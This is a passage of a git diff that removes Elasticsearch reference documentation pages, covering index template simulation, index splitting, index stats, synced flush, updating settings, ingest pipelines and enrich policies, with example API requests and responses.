-[%collapsible%open] -==== -`index_patterns`:: -(array) Index patterns that the superseded template applies to. - -`name`:: -(string) Name of the superseded template. -==== - -`template`:: -(object) -The settings, mappings, and aliases that would be applied to matching indices. -+ -.Properties of `template` -[%collapsible%open] -==== -include::{es-ref-dir}/rest-api/common-parms.asciidoc[tag=aliases] - -include::{es-ref-dir}/rest-api/common-parms.asciidoc[tag=mappings] - -include::{es-ref-dir}/rest-api/common-parms.asciidoc[tag=settings] -==== - -[[simulate-template-api-example]] -==== {api-examples-title} - -[[simulate-existing-template-ex]] -===== Simulating an existing template - -The following example creates and simulates a composed template: - -[source,console] --------------------------------------------------- -PUT /_component_template/ct1 <1> -{ - "template": { - "settings": { - "index.number_of_shards": 2 - } - } -} - -PUT /_component_template/ct2 <2> -{ - "template": { - "settings": { - "index.number_of_replicas": 0 - }, - "mappings": { - "properties": { - "@timestamp": { - "type": "date" - } - } - } - } -} - -PUT /_index_template/final-template <3> -{ - "index_patterns": ["my-index-*"], - "composed_of": ["ct1", "ct2"], - "priority": 5 -} - -POST /_index_template/_simulate/final-template <4> --------------------------------------------------- -<1> Create a component template (`ct1`) that sets the number of shards to 2 -<2> Create a component template (`ct2`) that sets the number of replicas to 0 and defines a mapping -<3> Create an index template (`final-template`) that uses the component templates -<4> Show the configuration applied by the `final-template` - -The response shows the index settings, mappings, and aliases applied by the `final-template`: - -[source,console-result] ---------------------------------------------------------- -{ - "template" : { - "settings" : { - "index" : { - "number_of_shards" : "2", <1> - "number_of_replicas" : "0" <2> - } - }, - "mappings" : { <3> - "properties" : { - "@timestamp" : { - "type" : "date" - } - } - }, - "aliases" : { } - }, - "overlapping" : [ ] -} ---------------------------------------------------------- -<1> Number of shards from `ct1` -<2> Number of replicas from `ct2` -<3> Mappings from `ct1` - - -[[simulate-template-config-ex]] -===== Simulating an arbitrary template configuration - -To see what settings will be applied by a template before you add it to the cluster, -you can pass a template configuration in the request body. -The specified template is used for the simulation if it has a higher priority than existing templates. - -[source,console] --------------------------------------------------- -POST /_index_template/_simulate -{ - "index_patterns": ["my-index-*"], - "composed_of": ["ct2"], - "priority": 10, - "template": { - "settings": { - "index.number_of_replicas": 1 - } - } -} --------------------------------------------------- -// TEST[continued] - -The response shows any overlapping templates with a lower priority. - -[source,console-result] ---------------------------------------------------------- -{ - "template" : { - "settings" : { - "index" : { - "number_of_replicas" : "1" - } - }, - "mappings" : { - "properties" : { - "@timestamp" : { - "type" : "date" - } - } - }, - "aliases" : { } - }, - "overlapping" : [ - { - "name" : "final-template", - "index_patterns" : [ - "my-index-*" - ] - } - ] -} ---------------------------------------------------------- \ No newline at end of file diff --git a/docs/reference/indices/split-index.asciidoc b/docs/reference/indices/split-index.asciidoc deleted file mode 100644 index 8fad3c53854..00000000000 --- a/docs/reference/indices/split-index.asciidoc +++ /dev/null @@ -1,280 +0,0 @@ -[[indices-split-index]] -=== Split index API -++++ -Split index -++++ - -Splits an existing index into a new index with more primary shards. - -[source,console] ----- -POST /my-index-000001/_split/split-my-index-000001 -{ - "settings": { - "index.number_of_shards": 2 - } -} ----- -// TEST[s/^/PUT my-index-000001\n{"settings":{"blocks.write":true}}\n/] - - -[[split-index-api-request]] -==== {api-request-title} - -`POST //_split/` - -`PUT //_split/` - - -[[split-index-api-prereqs]] -==== {api-prereq-title} - - -Before you can split an index: - -* The index must be read-only. -* The <> status must be green. - -You can do make an index read-only -with the following request: - -[source,console] --------------------------------------------------- -PUT /my_source_index/_settings -{ - "settings": { - "index.blocks.write": true <1> - } -} --------------------------------------------------- -// TEST[s/^/PUT my_source_index\n/] - -<1> Prevents write operations to this index while still allowing metadata - changes like deleting the index. - -The current write index on a data stream cannot be split. In order to split -the current write index, the data stream must first be -<> so that a new write index is created -and then the previous write index can be split. - -[[split-index-api-desc]] -==== {api-description-title} - -The split index API allows you to split an existing index into a new index, -where each original primary shard is split into two or more primary shards in -the new index. - -The number of times the index can be split (and the number of shards that each -original shard can be split into) is determined by the -`index.number_of_routing_shards` setting. The number of routing shards -specifies the hashing space that is used internally to distribute documents -across shards with consistent hashing. For instance, a 5 shard index with -`number_of_routing_shards` set to `30` (`5 x 2 x 3`) could be split by a -factor of `2` or `3`. In other words, it could be split as follows: - -* `5` -> `10` -> `30` (split by 2, then by 3) -* `5` -> `15` -> `30` (split by 3, then by 2) -* `5` -> `30` (split by 6) - -`index.number_of_routing_shards` is a <>. You can only set `index.number_of_routing_shards` at index creation -time or on a <>. - -.*Index creation example* -[%collapsible] -==== -The following <> creates the -`my-index-000001` index with an `index.number_of_routing_shards` setting of `30`. - -[source,console] ----- -PUT /my-index-000001 -{ - "settings": { - "index": { - "number_of_routing_shards": 30 - } - } -} ----- -// TEST[continued] -==== - -The `index.number_of_routing_shards` setting's default value depends -on the number of primary shards in the original index. -The default is designed to allow you to split -by factors of 2 up to a maximum of 1024 shards. However, the original number -of primary shards must taken into account. For instance, an index created -with 5 primary shards could be split into 10, 20, 40, 80, 160, 320, or a -maximum of 640 shards (with a single split action or multiple split actions). - -If the original index contains one primary shard (or a multi-shard index has -been <> down to a single primary shard), then the -index may by split into an arbitrary number of shards greater than 1. The -properties of the default number of routing shards will then apply to the -newly split index. - - -[[how-split-works]] -===== How splitting works - -A split operation: - -. Creates a new target index with the same definition as the source - index, but with a larger number of primary shards. - -. Hard-links segments from the source index into the target index. (If - the file system doesn't support hard-linking, then all segments are copied - into the new index, which is a much more time consuming process.) - -. Hashes all documents again, after low level files are created, to delete - documents that belong to a different shard. - -. Recovers the target index as though it were a closed index which - had just been re-opened. - - -[[incremental-resharding]] -===== Why doesn't Elasticsearch support incremental resharding? - -Going from `N` shards to `N+1` shards, aka. incremental resharding, is indeed a -feature that is supported by many key-value stores. Adding a new shard and -pushing new data to this new shard only is not an option: this would likely be -an indexing bottleneck, and figuring out which shard a document belongs to -given its `_id`, which is necessary for get, delete and update requests, would -become quite complex. This means that we need to rebalance existing data using -a different hashing scheme. - -The most common way that key-value stores do this efficiently is by using -consistent hashing. Consistent hashing only requires `1/N`-th of the keys to -be relocated when growing the number of shards from `N` to `N+1`. However -Elasticsearch's unit of storage, shards, are Lucene indices. Because of their -search-oriented data structure, taking a significant portion of a Lucene index, -be it only 5% of documents, deleting them and indexing them on another shard -typically comes with a much higher cost than with a key-value store. This cost -is kept reasonable when growing the number of shards by a multiplicative factor -as described in the above section: this allows Elasticsearch to perform the -split locally, which in-turn allows to perform the split at the index level -rather than reindexing documents that need to move, as well as using hard links -for efficient file copying. - -In the case of append-only data, it is possible to get more flexibility by -creating a new index and pushing new data to it, while adding an alias that -covers both the old and the new index for read operations. Assuming that the -old and new indices have respectively +M+ and +N+ shards, this has no overhead -compared to searching an index that would have +M+N+ shards. - - -[[split-index]] -===== Split an index - -To split `my_source_index` into a new index called `my_target_index`, issue -the following request: - -[source,console] --------------------------------------------------- -POST /my_source_index/_split/my_target_index -{ - "settings": { - "index.number_of_shards": 2 - } -} --------------------------------------------------- -// TEST[continued] - -The above request returns immediately once the target index has been added to -the cluster state -- it doesn't wait for the split operation to start. - -[IMPORTANT] -===================================== - -Indices can only be split if they satisfy the following requirements: - -* the target index must not exist - -* The source index must have fewer primary shards than the target index. - -* The number of primary shards in the target index must be a multiple of the - number of primary shards in the source index. - -* The node handling the split process must have sufficient free disk space to - accommodate a second copy of the existing index. - -===================================== - -The `_split` API is similar to the <> -and accepts `settings` and `aliases` parameters for the target index: - -[source,console] --------------------------------------------------- -POST /my_source_index/_split/my_target_index -{ - "settings": { - "index.number_of_shards": 5 <1> - }, - "aliases": { - "my_search_indices": {} - } -} --------------------------------------------------- -// TEST[s/^/PUT my_source_index\n{"settings": {"index.blocks.write": true, "index.number_of_shards": "1"}}\n/] - -<1> The number of shards in the target index. This must be a multiple of the - number of shards in the source index. - - -NOTE: Mappings may not be specified in the `_split` request. - - -[[monitor-split]] -===== Monitor the split process - -The split process can be monitored with the <>, or the <> can be used to wait -until all primary shards have been allocated by setting the `wait_for_status` -parameter to `yellow`. - -The `_split` API returns as soon as the target index has been added to the -cluster state, before any shards have been allocated. At this point, all -shards are in the state `unassigned`. If, for any reason, the target index -can't be allocated, its primary shard will remain `unassigned` until it -can be allocated on that node. - -Once the primary shard is allocated, it moves to state `initializing`, and the -split process begins. When the split operation completes, the shard will -become `active`. At that point, Elasticsearch will try to allocate any -replicas and may decide to relocate the primary shard to another node. - - -[[split-wait-active-shards]] -===== Wait for active shards - -Because the split operation creates a new index to split the shards to, -the <> setting -on index creation applies to the split index action as well. - - -[[split-index-api-path-params]] -==== {api-path-parms-title} - -``:: -(Required, string) -Name of the source index to split. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=target-index] - - -[[split-index-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=wait_for_active_shards] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=timeoutparms] - - -[[split-index-api-request-body]] -==== {api-request-body-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=target-index-aliases] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=target-index-settings] diff --git a/docs/reference/indices/stats.asciidoc b/docs/reference/indices/stats.asciidoc deleted file mode 100644 index afd8409a48c..00000000000 --- a/docs/reference/indices/stats.asciidoc +++ /dev/null @@ -1,143 +0,0 @@ -[[indices-stats]] -=== Index stats API -++++ -Index stats -++++ - -Returns statistics for one or more indices. For data streams, the API retrieves -statistics for the stream's backing indices. - -[source,console] ----- -GET /my-index-000001/_stats ----- -// TEST[setup:my_index] - - -[[index-stats-api-request]] -==== {api-request-title} - -`GET //_stats/` - -`GET //_stats` - -`GET /_stats` - - -[[index-stats-api-desc]] -==== {api-description-title} - -Use the index stats API to get high-level aggregation and statistics for one or -more data streams and indices. - -By default, -the returned statistics are index-level -with `primaries` and `total` aggregations. -`primaries` are the values for only the primary shards. -`total` are the accumulated values for both primary and replica shards. - -To get shard-level statistics, -set the `level` parameter to `shards`. - -[NOTE] -==== -When moving to another node, -the shard-level statistics for a shard are cleared. -Although the shard -is no longer part of the node, -that node retains any node-level statistics -to which the shard contributed. -==== - - -[[index-stats-api-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) -Comma-separated list of data streams, indices, and index aliases used to limit -the request. Wildcard expressions (`*`) are supported. -+ -To target all data streams and indices in a cluster, omit this parameter or use -`_all` or `*`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-metric] - - -[[index-stats-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=expand-wildcards] -+ -Defaults to `open`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=fields] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=completion-fields] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=fielddata-fields] - -`forbid_closed_indices`:: -(Optional, Boolean) -If `true`, statistics are *not* collected from closed indices. -Defaults to `true`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=groups] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=level] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=include-segment-file-sizes] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=include-unloaded-segments] - - -[[index-stats-api-example]] -==== {api-examples-title} - - -[[index-stats-api-multiple-ex]] -===== Get statistics for multiple data streams and indices - -[source,console] --------------------------------------------------- -GET /index1,index2/_stats --------------------------------------------------- -// TEST[s/^/PUT index1\nPUT index2\n/] - - -[[index-stats-api-all-ex]] -===== Get statistics for all data streams and indices in a cluster - -[source,console] --------------------------------------------------- -GET /_stats --------------------------------------------------- -// TEST[setup:my_index] - - -[[index-stats-api-specific-stats-ex]] -===== Get specific statistics - -The following request returns -only the `merge` and `refresh` statistics -for all indices. - -[source,console] --------------------------------------------------- -GET /_stats/merge,refresh --------------------------------------------------- -// TEST[setup:my_index] - - -[[index-stats-api-specific-groups-ex]] -===== Get statistics for specific search groups - -The following request returns -only search statistics -for the `group1` and `group2` search groups. - -[source,console] --------------------------------------------------- -GET /_stats/search?groups=group1,group2 --------------------------------------------------- -// TEST[setup:my_index] diff --git a/docs/reference/indices/synced-flush.asciidoc b/docs/reference/indices/synced-flush.asciidoc deleted file mode 100644 index fc2dc9cd27b..00000000000 --- a/docs/reference/indices/synced-flush.asciidoc +++ /dev/null @@ -1,279 +0,0 @@ -[[indices-synced-flush-api]] -=== Synced flush API -++++ -Synced flush -++++ - -deprecated::[7.6, "Synced-flush is deprecated and will be removed in 8.0. Use <> instead. A flush has the same effect as a synced flush on Elasticsearch 7.6 or later."] - -Performs a synced flush on one or more indices. - -[source,console] --------------------------------------------------- -POST /my-index-000001/_flush/synced --------------------------------------------------- -// TEST[skip: Synced flush can conflict with scheduled flushes in doc tests] - - -[[synced-flush-api-request]] -==== {api-request-title} - -`POST //_flush/synced` - -`GET //_flush/synced` - -`POST /_flush/synced` - -`GET /_flush/synced` - - -[[synced-flush-api-desc]] -==== {api-description-title} - -[[synced-flush-using-api]] -===== Use the synced flush API - -Use the synced flush API to manually initiate a synced flush. -This can be useful for a planned cluster restart where -you can stop indexing but don't want to wait for 5 minutes until all indices -are marked as inactive and automatically sync-flushed. - -You can request a synced flush even if there is ongoing indexing activity, and -{es} will perform the synced flush on a "best-effort" basis: shards that do not -have any ongoing indexing activity will be successfully sync-flushed, and other -shards will fail to sync-flush. The successfully sync-flushed shards will have -faster recovery times as long as the `sync_id` marker is not removed by a -subsequent flush. - - -[[synced-flush-overview]] -===== Synced flush overview - -{es} keeps track of which shards have received indexing activity recently, and -considers shards that have not received any indexing operations for 5 minutes to -be inactive. - -When a shard becomes inactive {es} performs a special kind of flush -known as a *synced flush*. A synced flush performs a normal -<> on each replica of the shard, and then adds a marker known -as the `sync_id` to each replica to indicate that these copies have identical -Lucene indices. Comparing the `sync_id` markers of the two copies is a very -efficient way to check whether they have identical contents. - -When allocating shard replicas, {es} must ensure that each replica contains the -same data as the primary. If the shard copies have been synced-flushed and the -replica shares a `sync_id` with the primary then {es} knows that the two copies -have identical contents. This means there is no need to copy any segment files -from the primary to the replica, which saves a good deal of time during -recoveries and restarts. - -This is particularly useful for clusters having lots of indices which are very -rarely updated, such as with time-based indices. Without the synced flush -marker, recovery of this kind of cluster would be much slower. - - -[[synced-flush-sync-id-markers]] -===== Check for `sync_id` markers - -To check whether a shard has a `sync_id` marker or not, look for the `commit` -section of the shard stats returned by the <> API: - -[source,console] --------------------------------------------------- -GET /my-index-000001/_stats?filter_path=**.commit&level=shards <1> --------------------------------------------------- -// TEST[skip: Synced flush can conflict with scheduled flushes in doc tests] - -<1> `filter_path` is used to reduce the verbosity of the response, but is entirely optional - -The API returns the following response: - -[source,console-result] --------------------------------------------------- -{ - "indices": { - "my-index-000001": { - "shards": { - "0": [ - { - "commit" : { - "id" : "3M3zkw2GHMo2Y4h4/KFKCg==", - "generation" : 3, - "user_data" : { - "translog_uuid" : "hnOG3xFcTDeoI_kvvvOdNA", - "history_uuid" : "XP7KDJGiS1a2fHYiFL5TXQ", - "local_checkpoint" : "-1", - "translog_generation" : "2", - "max_seq_no" : "-1", - "sync_id" : "AVvFY-071siAOuFGEO9P", <1> - "max_unsafe_auto_id_timestamp" : "-1", - "min_retained_seq_no" : "0" - }, - "num_docs" : 0 - } - } - ] - } - } - } -} --------------------------------------------------- -// TEST[skip: Synced flush can conflict with scheduled flushes in doc tests] -<1> the `sync id` marker - -NOTE: The `sync_id` marker is removed as soon as the shard is flushed again, and -{es} may trigger an automatic flush of a shard at any time if there are -unflushed operations in the shard's translog. In practice this means that one -should consider any indexing operation on an index as having removed its -`sync_id` markers. - - -[[synced-flush-api-path-params]] -==== {api-path-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index] -+ -To sync-flush all indices, -omit this parameter -or use a value of `_all` or `*`. - - -[[synced-flush-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=allow-no-indices] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=expand-wildcards] -+ -Defaults to `open`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-ignore-unavailable] - - -[[synced-flush-api-response-codes]] -==== {api-response-codes-title} - -`200`:: -All shards successfully sync-flushed. - -`409`:: -A replica shard failed to sync-flush. - - -[[synced-flush-api-example]] -==== {api-examples-title} - - -[[synced-flush-api-specific-ex]] -===== Sync-flush a specific index - -[source,console] ----- -POST /kimchy/_flush/synced ----- -// TEST[skip: Synced flush can conflict with scheduled flushes in doc tests] - - -[[synced-flush-api-multi-ex]] -===== Synch-flush several indices - -[source,console] --------------------------------------------------- -POST /kimchy,elasticsearch/_flush/synced --------------------------------------------------- -// TEST[skip: Synced flush can conflict with scheduled flushes in doc tests] - - -[[synced-flush-api-all-ex]] -===== Sync-flush all indices - -[source,console] --------------------------------------------------- -POST /_flush/synced --------------------------------------------------- -// TEST[skip: Synced flush can conflict with scheduled flushes in doc tests] - -The response contains details about how many shards were successfully -sync-flushed and information about any failure. - -The following response indicates two shards -and one replica shard -successfully sync-flushed: - -[source,console-result] --------------------------------------------------- -{ - "_shards": { - "total": 2, - "successful": 2, - "failed": 0 - }, - "my-index-000001": { - "total": 2, - "successful": 2, - "failed": 0 - } -} --------------------------------------------------- -// TEST[skip: Synced flush can conflict with scheduled flushes in doc tests] - -The following response indicates one shard group failed -due to pending operations: - -[source,console-result] --------------------------------------------------- -{ - "_shards": { - "total": 4, - "successful": 2, - "failed": 2 - }, - "my-index-000001": { - "total": 4, - "successful": 2, - "failed": 2, - "failures": [ - { - "shard": 1, - "reason": "[2] ongoing operations on primary" - } - ] - } -} --------------------------------------------------- -// TEST[skip: Synced flush can conflict with scheduled flushes in doc tests] - -Sometimes the failures are specific to a shard replica. The copies that failed -will not be eligible for fast recovery but those that succeeded still will be. -This case is reported as follows: - -[source,console-result] --------------------------------------------------- -{ - "_shards": { - "total": 4, - "successful": 1, - "failed": 1 - }, - "my-index-000001": { - "total": 4, - "successful": 3, - "failed": 1, - "failures": [ - { - "shard": 1, - "reason": "unexpected error", - "routing": { - "state": "STARTED", - "primary": false, - "node": "SZNr2J_ORxKTLUCydGX4zA", - "relocating_node": null, - "shard": 1, - "index": "my-index-000001" - } - } - ] - } -} --------------------------------------------------- -// TEST[skip: Synced flush can conflict with scheduled flushes in doc tests] diff --git a/docs/reference/indices/types-exists.asciidoc b/docs/reference/indices/types-exists.asciidoc deleted file mode 100644 index 87a1c471d4d..00000000000 --- a/docs/reference/indices/types-exists.asciidoc +++ /dev/null @@ -1,40 +0,0 @@ -[[indices-types-exists]] -=== Type exists API -++++ -Type exists -++++ - -deprecated::[7.0.0, Types are deprecated and are in the process of being removed. See <>.] - -Checks if a <> exists. - -[source,console] ----- -HEAD my-index-000001/_mapping/message ----- -// TEST[setup:my_index] -// TEST[warning:Type exists requests are deprecated, as types have been deprecated.] - - -[[indices-types-exists-api-request]] -==== {api-request-title} - -`HEAD //_mapping/` - - -[[indices-types-exists-api-path-params]] -==== {api-path-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=type] - - -[[indices-types-exists-api-response-codes]] -==== {api-response-codes-title} - -`200`:: -Indicates all specified mapping types exist. - - `404`:: -Indicates one or more specified mapping types **do not** exist. diff --git a/docs/reference/indices/update-settings.asciidoc b/docs/reference/indices/update-settings.asciidoc deleted file mode 100644 index 4afb12120e7..00000000000 --- a/docs/reference/indices/update-settings.asciidoc +++ /dev/null @@ -1,186 +0,0 @@ -[[indices-update-settings]] -=== Update index settings API -++++ -Update index settings -++++ - -Changes a <> in real time. - -For data streams, index setting changes are applied to all backing indices by -default. - -[source,console] --------------------------------------------------- -PUT /my-index-000001/_settings -{ - "index" : { - "number_of_replicas" : 2 - } -} --------------------------------------------------- -// TEST[setup:my_index] - - -[[update-index-settings-api-request]] -==== {api-request-title} - -`PUT //_settings` - - -[[update-index-settings-api-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) -Comma-separated list of data streams, indices, and index aliases used to limit -the request. Wildcard expressions (`*`) are supported. -+ -To target all data streams and indices in a cluster, omit this parameter or use -`_all` or `*`. - - -[[update-index-settings-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=allow-no-indices] -+ -Defaults to `false`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=expand-wildcards] -+ -Defaults to `open`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=flat-settings] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-ignore-unavailable] - -`preserve_existing`:: -(Optional, Boolean) If `true`, existing index settings remain unchanged. -Defaults to `false`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=timeoutparms] - - -[[update-index-settings-api-request-body]] -==== {api-request-body-title} - -`settings`:: -(Optional, <>) Configuration -options for the index. See <>. - -[[update-index-settings-api-example]] -==== {api-examples-title} - -[[reset-index-setting]] -===== Reset an index setting -To revert a setting to the default value, use `null`. For example: - -[source,console] --------------------------------------------------- -PUT /my-index-000001/_settings -{ - "index" : { - "refresh_interval" : null - } -} --------------------------------------------------- -// TEST[setup:my_index] - -The list of per-index settings which can be updated dynamically on live -indices can be found in <>. -To preserve existing settings from being updated, the `preserve_existing` -request parameter can be set to `true`. - -[[bulk]] -===== Bulk indexing usage - -For example, the update settings API can be used to dynamically change -the index from being more performant for bulk indexing, and then move it -to more real time indexing state. Before the bulk indexing is started, -use: - -[source,console] --------------------------------------------------- -PUT /my-index-000001/_settings -{ - "index" : { - "refresh_interval" : "-1" - } -} --------------------------------------------------- -// TEST[setup:my_index] - -(Another optimization option is to start the index without any replicas, -and only later adding them, but that really depends on the use case). - -Then, once bulk indexing is done, the settings can be updated (back to -the defaults for example): - -[source,console] --------------------------------------------------- -PUT /my-index-000001/_settings -{ - "index" : { - "refresh_interval" : "1s" - } -} --------------------------------------------------- -// TEST[continued] - -And, a force merge should be called: - -[source,console] --------------------------------------------------- -POST /my-index-000001/_forcemerge?max_num_segments=5 --------------------------------------------------- -// TEST[continued] - -[[update-settings-analysis]] -===== Update index analysis - -You can only define new analyzers on closed indices. - -To add an analyzer, -you must close the index, -define the analyzer, -and reopen the index. - -[NOTE] -==== -You cannot close the write index of a data stream. - -To update the analyzer for a data stream's write index and future backing -indices, update the analyzer in the <>. Then <> to apply the new analyzer to the stream’s write index and -future backing indices. This affects searches and any new data added to the -stream after the rollover. However, it does not affect the data stream's backing -indices or their existing data. - -To change the analyzer for existing backing indices, you must create a -new data stream and reindex your data into it. See -<>. -==== - -For example, -the following commands add the `content` analyzer to the `my-index-000001` index: - -[source,console] --------------------------------------------------- -POST /my-index-000001/_close - -PUT /my-index-000001/_settings -{ - "analysis" : { - "analyzer":{ - "content":{ - "type":"custom", - "tokenizer":"whitespace" - } - } - } -} - -POST /my-index-000001/_open --------------------------------------------------- -// TEST[setup:my_index] diff --git a/docs/reference/ingest.asciidoc b/docs/reference/ingest.asciidoc deleted file mode 100644 index 3110a2df96f..00000000000 --- a/docs/reference/ingest.asciidoc +++ /dev/null @@ -1,89 +0,0 @@ -[[ingest]] -= Ingest node - -[partintro] --- -Use an ingest node to pre-process documents before the actual document indexing happens. -The ingest node intercepts bulk and index requests, it applies transformations, and it then -passes the documents back to the index or bulk APIs. - -All nodes enable ingest by default, so any node can handle ingest tasks. You can also create -dedicated ingest nodes. To disable ingest for a node, configure the following setting in the -elasticsearch.yml file: - -[source,yaml] ----- -node.roles: [ ingest ] ----- - -To pre-process documents before indexing, <> that specifies a series of -<>. Each processor transforms the document in some specific way. For example, a -pipeline might have one processor that removes a field from the document, followed by -another processor that renames a field. The <> then stores -the configured pipelines. - -To use a pipeline, simply specify the `pipeline` parameter on an index or bulk request. This -way, the ingest node knows which pipeline to use. - -For example: -Create a pipeline - -[source,console] --------------------------------------------------- -PUT _ingest/pipeline/my_pipeline_id -{ - "description" : "describe pipeline", - "processors" : [ - { - "set" : { - "field": "foo", - "value": "new" - } - } - ] -} --------------------------------------------------- - -Index with defined pipeline - -[source,console] --------------------------------------------------- -PUT my-index-00001/_doc/my-id?pipeline=my_pipeline_id -{ - "foo": "bar" -} --------------------------------------------------- -// TEST[continued] - -Response: - -[source,console-result] --------------------------------------------------- -{ - "_index" : "my-index-00001", - "_type" : "_doc", - "_id" : "my-id", - "_version" : 1, - "result" : "created", - "_shards" : { - "total" : 2, - "successful" : 2, - "failed" : 0 - }, - "_seq_no" : 0, - "_primary_term" : 1 -} --------------------------------------------------- -// TESTRESPONSE[s/"successful" : 2/"successful" : 1/] - -An index may also declare a <> that will be used in the -absence of the `pipeline` parameter. - -Finally, an index may also declare a <> -that will be executed after any request or default pipeline (if any). - -See <> for more information about creating, adding, and deleting pipelines. - --- - -include::ingest/ingest-node.asciidoc[] diff --git a/docs/reference/ingest/apis/delete-pipeline.asciidoc b/docs/reference/ingest/apis/delete-pipeline.asciidoc deleted file mode 100644 index 368f9f2b026..00000000000 --- a/docs/reference/ingest/apis/delete-pipeline.asciidoc +++ /dev/null @@ -1,102 +0,0 @@ -[[delete-pipeline-api]] -=== Delete pipeline API -++++ -Delete pipeline -++++ - -Deletes one or more existing ingest pipeline. - -//// -[source,console] ----- -PUT /_ingest/pipeline/my-pipeline-id -{ - "description" : "example pipeline to delete", - "processors" : [ ] -} - -PUT /_ingest/pipeline/pipeline-one -{ - "description" : "another example pipeline to delete", - "processors" : [ ] -} ----- -// TESTSETUP -//// - -[source,console] ----- -DELETE /_ingest/pipeline/my-pipeline-id ----- - - -[[delete-pipeline-api-request]] -==== {api-request-title} - -`DELETE /_ingest/pipeline/` - -[[delete-pipeline-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the -`manage_pipeline`, `manage_ingest_pipelines`, or `manage` -<> to use this API. - -[[delete-pipeline-api-path-params]] -==== {api-path-parms-title} - -``:: -+ --- -(Required, string) Pipeline ID or wildcard expression of pipeline IDs -used to limit the request. - -To delete all ingest pipelines in a cluster, -use a value of `*`. --- - - -[[delete-pipeline-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=timeoutparms] - - -[[delete-pipeline-api-api-example]] -==== {api-examples-title} - - -[[delete-pipeline-api-specific-ex]] -===== Delete a specific ingest pipeline - -[source,console] ----- -DELETE /_ingest/pipeline/pipeline-one ----- - - -[[delete-pipeline-api-wildcard-ex]] -===== Delete ingest pipelines using a wildcard expression - -[source,console] ----- -DELETE /_ingest/pipeline/pipeline-* ----- - - -[[delete-pipeline-api-all-ex]] -===== Delete all ingest pipelines - -[source,console] ----- -DELETE /_ingest/pipeline/* ----- - -//// -[source,console-result] ----- -{ -"acknowledged": true -} ----- -//// diff --git a/docs/reference/ingest/apis/enrich/delete-enrich-policy.asciidoc b/docs/reference/ingest/apis/enrich/delete-enrich-policy.asciidoc deleted file mode 100644 index cc26030369d..00000000000 --- a/docs/reference/ingest/apis/enrich/delete-enrich-policy.asciidoc +++ /dev/null @@ -1,75 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[delete-enrich-policy-api]] -=== Delete enrich policy API -++++ -Delete enrich policy -++++ - -Deletes an existing <> and its -<>. - -//// -[source,console] ----- -PUT /users -{ - "mappings": { - "properties": { - "email": { "type": "keyword" } - } - } -} - -PUT /_enrich/policy/my-policy -{ - "match": { - "indices": "users", - "match_field": "email", - "enrich_fields": [ "first_name", "last_name", "city", "zip", "state" ] - } -} ----- -// TESTSETUP -//// - -[source,console] --------------------------------------------------- -DELETE /_enrich/policy/my-policy --------------------------------------------------- - - -[[delete-enrich-policy-api-request]] -==== {api-request-title} - -`DELETE /_enrich/policy/` - - -[[delete-enrich-policy-api-prereqs]] -==== {api-prereq-title} - -include::put-enrich-policy.asciidoc[tag=enrich-policy-api-prereqs] - - -[[delete-enrich-policy-api-desc]] -==== {api-description-title} - -Use the delete enrich policy API -to delete an existing enrich policy -and its enrich index. - -[IMPORTANT] -==== -You must remove an enrich policy -from any in-use ingest pipelines -before deletion. -You cannot remove in-use enrich policies. -==== - - -[[delete-enrich-policy-api-path-params]] -==== {api-path-parms-title} - -``:: -(Required, string) -Enrich policy to delete. diff --git a/docs/reference/ingest/apis/enrich/enrich-stats.asciidoc b/docs/reference/ingest/apis/enrich/enrich-stats.asciidoc deleted file mode 100644 index f7bc9680db6..00000000000 --- a/docs/reference/ingest/apis/enrich/enrich-stats.asciidoc +++ /dev/null @@ -1,135 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[enrich-stats-api]] -=== Enrich stats API -++++ -Enrich stats -++++ - -Returns <> statistics -and information about <> -that are currently executing. - -[source,console] ----- -GET /_enrich/_stats ----- - - -[[enrich-stats-api-request]] -==== {api-request-title} - -`GET /_enrich/_stats` - - -[[enrich-stats-api-response-body]] -==== {api-response-body-title} - -`executing_policies`:: -+ --- -(Array of objects) -Objects containing information -about each enrich policy -that is currently executing. - -Returned parameters include: - -`name`:: -(String) -Name of the enrich policy. - -`task`:: -(<>) -Object containing detailed information -about the policy execution task. --- - -`coordinator_stats`:: -+ --- -(Array of objects) -Objects containing information -about each <> -for configured enrich processors. - -Returned parameters include: - -`node_id`:: -(String) -ID of the ingest node coordinating search requests -for configured enrich processors. - -`queue_size`:: -(Integer) -Number of search requests in the queue. - -`remote_requests_current`:: -(Integer) -Current number of outstanding remote requests. - -`remote_requests_total`:: -(Integer) -Number of outstanding remote requests executed -since node startup. -+ -In most cases, -a remote request includes multiple search requests. -This depends on the number of search requests in the queue -when the remote request is executed. - 